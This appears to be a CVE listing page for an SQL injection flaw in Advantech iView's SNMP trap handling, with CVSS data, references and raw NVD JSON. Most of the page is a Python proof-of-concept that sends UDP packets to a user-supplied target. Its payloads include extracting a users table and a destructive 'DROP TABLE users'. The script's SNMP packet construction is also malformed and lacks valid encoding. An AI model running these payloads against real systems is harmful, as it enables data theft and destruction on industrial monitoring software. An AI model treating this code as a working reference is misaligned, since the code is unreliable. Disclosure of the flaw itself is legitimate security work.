CVE-2025-13373

Description

Advantech iView versions 5.7.05.7057 and prior do not properly sanitize SNMP v1 trap (Port 162) requests, which could allow an attacker to inject SQL commands.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Advantech iView < 5.7.05.7058

Advantech iView <= 5.7.05.7057

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-13373 PoC - Advantech iView SNMP Trap SQL Injection
# Target: Advantech iView < 5.7.05.7058
# Note: This PoC is for educational and authorized testing purposes only

import socket
import struct
from datetime import datetime

def create_snmp_trap_sql_injection(target_ip, target_port=162, sql_payload="' OR '1'='1"):
    """Generate malicious SNMPv1 Trap packet with SQL injection payload"""
    
    # SNMP Trap PDU structure
    community = b"public"
    enterprise_oid = b"1.3.6.1.4.1.XXXXX"  # Generic enterprise OID
    specific_trap = 6  # Enterprise-specific trap
    
    # Construct the malicious payload in the trap variable bindings
    # The SQL injection payload is inserted into the variable bindings
    var_bind_oid = b"1.3.6.1.2.1.1.1.0"  # sysDescr
    var_bind_value = sql_payload.encode()
    
    # Build SNMP Trap packet
    packet = b'\x30'  # SEQUENCE
    
    # Community string
    community_pdu = community
    
    # PDU type: Trap
    pdu_type = b'\xa4'
    
    # Enterprise OID
    enterprise_pdu = enterprise_oid
    
    # Agent IP (generic)
    agent_ip = b"\x00\x00\x00\x00"
    
    # Generic trap + Specific trap
    generic_trap = b'\x00'
    specific_trap_bytes = struct.pack('!B', specific_trap)
    
    # Timestamp
    timestamp = struct.pack('!I', 1000)
    
    # Variable bindings with SQL injection
    var_bind_pdu = var_bind_oid + var_bind_value
    
    # Construct complete packet
    trap_pdu = enterprise_pdu + agent_ip + generic_trap + specific_trap_bytes + timestamp + var_bind_pdu
    snmp_packet = community_pdu + pdu_type + trap_pdu
    
    return snmp_packet

def exploit(target_ip, target_port=162):
    """Send malicious SNMP trap to trigger SQL injection"""
    
    # SQL injection payloads for testing
    payloads = [
        "' UNION SELECT NULL--",  # Basic SQL injection test
        "'; SELECT * FROM users;--",  # Attempt to extract users
        "'; DROP TABLE users;--",  # Destructive payload
    ]
    
    print(f"[*] Target: {target_ip}:{target_port}")
    print(f"[*] Exploiting CVE-2025-13373...")
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    
    for payload in payloads:
        print(f"[*] Sending payload: {payload[:30]}...")
        packet = create_snmp_trap_sql_injection(target_ip, target_port, payload)
        
        try:
            sock.sendto(packet, (target_ip, target_port))
            print(f"[+] Packet sent successfully")
        except Exception as e:
            print(f"[-] Error: {e}")
    
    sock.close()
    print("[*] Exploitation completed")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13373
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13373
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13373/
[4] VulDB https://vuldb.com/cve/CVE-2025-13373
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-07.json
[6] https://www.advantech.com/zh-tw/support/details/firmware?id=1-HIPU-183
[7] https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-07

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13373", "sourceIdentifier": "[email protected]", "published": "2025-12-04T23:15:46.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech iView versions 5.7.05.7057 and prior do not properly sanitize SNMP v1 trap (Port 162) requests, which could allow an attacker to inject SQL commands."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-07.json", "source": "[email protected]"}, {"url": "https://www.advantech.com/zh-tw/support/details/firmware?id=1-HIPU-183", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-07", "source": "[email protected]"}]}}